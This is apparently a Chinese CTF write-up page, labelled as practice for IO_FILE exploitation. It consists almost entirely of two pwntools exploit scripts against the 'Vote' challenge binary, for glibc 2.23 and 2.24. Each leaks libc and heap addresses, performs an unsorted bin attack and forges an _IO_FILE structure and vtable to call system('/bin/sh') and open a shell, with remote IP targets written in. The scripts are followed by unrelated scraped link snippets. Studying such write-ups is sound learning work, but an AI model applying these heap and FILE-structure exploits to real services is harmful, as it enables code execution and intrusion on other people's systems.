H1ctf-Vote
用来练习IO_FILE利用
glibc-2.23
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("/home/moonagirl/moonagirl/libc/libc_local_x64")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote')
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000) def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
# io.interactive()
show(0)
io.recvuntil("count: ")
libc.address = int(io.recvline()[:-1]) - main_arena_off
log.success("libc address: " + hex(libc.address))
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
log.success("heap address: " + hex(heap_address))
vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6
create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
vtable_addr = heap_address + 0x410 fake_file = IO_FILE_plus_struct()
fake_file._flags = u64("/bin/sh\x00")
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base = libc.symbols['_IO_list_all'] - 0x10
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = vtable_addr payload += str(fake_file) payload += p64(1)
payload += p64(2)
payload += p64(3)
payload += p64(libc.symbols["system"])
payload += '\n'
create(0x288, payload) # size 0x2A1
# now chunk3 removed from unsorted bin, unsorted bin only has chunk4
pause()
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(48))
io.interactive() if __name__ == "__main__":
pwnit()
pause()
glibc-2.24
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("./libc-2.24.so")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote',env={"LD_PRELOAD":"./libc-2.24.so"})
# __malloc_hook+68
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000)
def z(a=''):
gdb.attach(io,a)
if a == '':
raw_input()
def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
show(0)
io.recvuntil("count: ")
libc_base = int(io.recvline()[:-1]) - main_arena_off
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
system = libc.symbols['system']
_IO_list_all= libc.symbols['_IO_list_all']
binsh = libc.search('/bin/sh\x00').next()
_IO_str_jumps = 0x3BE4C0 + libc_base system = libc_base+libc.symbols['system']
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
# _IO_str_jumps = libc_base+libc.symbols['_IO_str_jumps']
binsh = libc_base+libc.search('/bin/sh\x00').next() vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6 create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
fake_file = IO_FILE_plus_struct()
fake_file._flags = 0
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base =_IO_list_all-0x10
fake_file._IO_buf_base = binsh
fake_file._mode = 0
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = _IO_str_jumps-8
payload+=str(fake_file).ljust(0xe8,'\x00')+p64(system) create(0x288, payload) # size 0x2A1
# io.interactive()
# pause()
create(0, 'get shell')
io.interactive()
if __name__ == "__main__":
pwnit()
# pause()
.
H1ctf-Vote的更多相关文章
- BZOJ-1934 Vote 善意的投票 最大流+建图
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MB Submit: 1551 Solved: 951 [Submit][S ...
- bzoj1934: [Shoi2007]Vote 善意的投票
最大流..建图方式都是玄学啊.. //Dinic是O(n2m)的. #include<cstdio> #include<cstring> #include<cctype& ...
- 最小投票BZOJ 1934([Shoi2007]Vote 善意的投票-最小割)
上班之余抽点时间出来写写博文,希望对新接触的朋友有帮助.今天在这里和大家一起学习一下最小投票 1934: [Shoi2007]Vote 好心的投票 Time Limit: 1 Sec Memory L ...
- [POLITICS] S Korea lawmakers vote to impeach leader
South Korea's Parliament has voted to impeach President Park Geun-hye. The National Assembly motion ...
- BZOJ 1934: [Shoi2007]Vote 善意的投票 最小割
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 256 MB 题目连接 http://www.lydsy.com/JudgeOnl ...
- A Linear Time Majority Vote Algorithm
介绍一种算法,它可以在线性时间和常数空间内,在一个数组内找出出现次数超过一半的某个数字. 要解决这个问题并不难,可以使用排序或哈希,但是这两种算法都不能同时满足时间或空间的要求. 然而,该算法(A L ...
- 11gR2更换OCR和VOTE
11gR2开始,OCR和VOTE它们被存储在ASM磁盘组,因此,更换OCR有两种方法,第一是使用ASM磁盘组drop disk数据重组后,另一种方法是OCR迁移到另一个磁盘组 第一种:add disk ...
- WeMall微商城源码投票插件Vote的主要源码
WeMall微信商城源码投票插件Vote,用于商城的签到系统,分享了部分比较重要的代码,供技术员学习参考 AdminController.class.php <?php namespace Ad ...
- 1934: [Shoi2007]Vote 善意的投票
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MBSubmit: 1174 Solved: 723[Submit][S ...
- Boyer-Moore Majority Vote Algorithm
介绍算法之前, 我们来看一个场景, 假设您有一个未排序的列表.您想知道列表中是否存在一个数量占列表的总数一半以上的元素, 我们称这样一个列表元素为 Majority 元素.如果有这样一个元素, 求出它 ...
随机推荐
- Filter的使用及其生命周期介绍
一.Filter 1. Filter简介 > Filter翻译为中文是过滤器的意思. > Filter是JavaWeb的三大web组件之一:Servlet.Filter.Listener ...
- 原来C#可以直接写二进制数的
二进制数在C#中的写法: byte b=0b01111110 二进制字符串的解释: string bstr="0111110"; byte b=Convert.ToByte(bst ...
- [USACO1.4]等差数列 Arithmetic Progressions
题目描述 一个等差数列是一个能表示成a, a+b, a+2b,..., a+nb (n=0,1,2,3,...)的数列. 在这个问题中a是一个非负的整数,b是正整数.写一个程序来找出在双平方数集合(双 ...
- POJ1321-棋盘问题
题目链接:点击打开链接 Description 在一个给定形状的棋盘(形状可能是不规则的)上面摆放棋子,棋子没有区别.要求摆放时任意的两个棋子不能放在棋盘中的同一行或者同一列,请编程求解对于给定形状和 ...
- AT2382 A or...or B Problem
传送门 还是看题解的啦 先考虑一个显而易见的结论:A和B二进制下最高的几位相同是没用的(设去掉的那些位之和为sum) 然后我们设\(d\)为二进制下从高位到低位第一位不相同的,\(k\)为B从高位到低 ...
- Hexo瞎折腾系列(9) - 网页标题崩溃特效
前言 本系列的所有修改均基于本系列第一篇中的新增文件(譬如custom.js),请先自行阅读Hexo瞎折腾系列(1) - 准备工作与简单美化:并按照文章所说自行修改代码或文件. 为网页添加标题崩溃特效 ...
- shell学习(14)- who
Linux who命令用于显示系统中有哪些使用者正在上面,显示的资料包含了使用者 ID.使用的终端机.从哪边连上来的.上线时间.呆滞时间.CPU 使用量.动作等等. 使用权限:所有使用者都可使用. 语 ...
- rsyslog服务器同步其他服务器上面应用日志(如mysql审计日志 、nginx日志)
**环境说明**系统:ubuntu 14.04 (CentOS可以参考http://www.cnblogs.com/hanyifeng/p/5463338.html) rsyslog版本 :8.16. ...
- Java文件与io——File类
概念: File类:表示文件和目录路径名的抽象表示形式. File类可以实现文件的创建.删除.重命名.得到路径.创建时间等等,是唯一与文件本身有关的操作类. 例: public class FileD ...
- {ldelim},{rdelim} - smarty 内建函数
{ldelim}和{rdelim}用来转义模板的分隔符,缺省为{和}.你也可以用{literal}{/literal}来转义文本块(如Javascript或CSS). 例: {* 在模板外将原样打印分 ...